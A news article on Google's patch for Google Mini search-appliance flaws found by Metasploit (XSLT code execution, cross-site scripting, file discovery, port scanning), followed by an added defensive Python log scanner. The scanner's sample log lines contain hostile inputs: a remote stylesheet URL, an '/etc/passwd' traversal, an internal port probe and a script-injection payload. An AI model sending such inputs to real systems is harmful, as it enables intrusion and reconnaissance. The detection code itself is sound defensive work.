Search engine darling Google Inc. has issued a patch to cover a range of potentially dangerous security flaws in the enterprise-facing Google Mini search appliance.
The company's patch was issued after researchers at the Metasploit Project pinpointed several bugs that can be exploited by malicious hackers to conduct cross-site scripting, file discovery and service enumeration attacks.
Metasploit creator H.D. Moore warned in an advisory that the most serious bug can lead to arbitrary command execution.
Security alerts aggregator Secunia Inc. rates the flaws as “highly critical.”
According to Moore, Google's patch and advisory were only released to businesses that pay about $3,000 for the pizza box-sized appliance.
A spokesperson for Google said the company learned of the issue several months ago and quickly made a patch available to all enterprise customers. “No customers have reported any effect related to this issue,” he added.
Metasploit's Moore said the flaw was discovered in a feature that allows customization of the Google Mini's search interface through XSLT (Extensible Stylesheet Language Transformations) style sheets. He explained that certain versions of the appliance allow a remote URL to be supplied as the path to the XSLT style sheet, and warned that the feature can be abused to perform malicious hacking attacks.
Moore said that input passed to the “proxystylesheet” parameter isn't properly sanitized before being returned to the user in an error message. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
In addition, XSLT style sheets provided by a user via a URL in the “proxystylesheet” parameter also aren't properly sanitized before being used. A malicious attacker can exploit this bug to execute arbitrary Java class methods on a vulnerable appliance via a malicious XSLT style sheet, Moore added.
It is also possible to conduct cross-site scripting attacks by including malicious JavaScript in the style sheet.
A third attack vector could allow an attacker to determine the existence of any file on the system by using a relative path from the style sheet directory, Moore added. “The error message returned from the server will disclose whether or not a valid path was provided. This can be used to fingerprint the base operating system and kernel version.”
Metasploit also discovered that a rudimentary port scan can be performed by requesting HTTP URLs that point to a target system and individual ports on that system. The error message returned from the server will differ between open and closed ports. The appliance will ignore requests to connect back to itself, but no other restrictions apply, he added.
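As an added example (not part of the original article, and not Google's or Metasploit's code), the following Python script scans web-server log lines for “proxystylesheet” values that match the four abuse patterns described above: remote style-sheet URLs, URLs carrying an explicit port, relative paths, and markup that would be reflected in an error message. The log format and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined-log layout assumed; not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2005:10:00:01 +0000] "GET /search?q=budget&proxystylesheet=default_frontend HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2005:10:00:02 +0000] "GET /search?q=x&proxystylesheet=http://198.51.100.7/s.xsl HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2005:10:00:03 +0000] "GET /search?q=x&proxystylesheet=../../etc/passwd HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2005:10:00:04 +0000] "GET /search?q=x&proxystylesheet=http://10.0.0.20:22/ HTTP/1.1" 500 310
10.0.0.9 - - [01/Jan/2005:10:00:05 +0000] "GET /search?q=x&proxystylesheet=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 500 310
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_stylesheet_value(value):
    """Return the reasons a proxystylesheet value looks abusive (empty list if benign)."""
    v = unquote(value)
    reasons = []
    parts = urlsplit(v)
    if parts.scheme in ("http", "https", "ftp"):
        reasons.append("remote_stylesheet")   # remote XSLT fetched by the appliance
        if parts.port is not None:
            reasons.append("port_probe")      # explicit port: service-enumeration pattern
    if ".." in v or v.startswith("/"):
        reasons.append("path_traversal")      # relative/absolute path: file-discovery pattern
    if "<" in v or ">" in v:
        reasons.append("reflected_markup")    # markup echoed back in the error message
    return reasons


def scan_log(text):
    """Parse each log line and report (source, value, reasons) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        for value in query.get("proxystylesheet", []):
            reasons = classify_stylesheet_value(value)
            if reasons:
                findings.append((m.group("src"), value, reasons))
    return findings


if __name__ == "__main__":
    for src, value, reasons in scan_log(SAMPLE_LOG):
        print(f"{src}\t{value}\t{','.join(reasons)}")
```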
Google Mini, a pared-down version of the high-end Google Search Appliance, is marketed to organizations with up to about 1,000 employees or in departments of larger companies.
The Mini can index as many as 100,000 documents and works with more than 220 different file formats, including HTML, PDF and Microsoft Office.
Editor's Note: This story was updated to include comments from Google.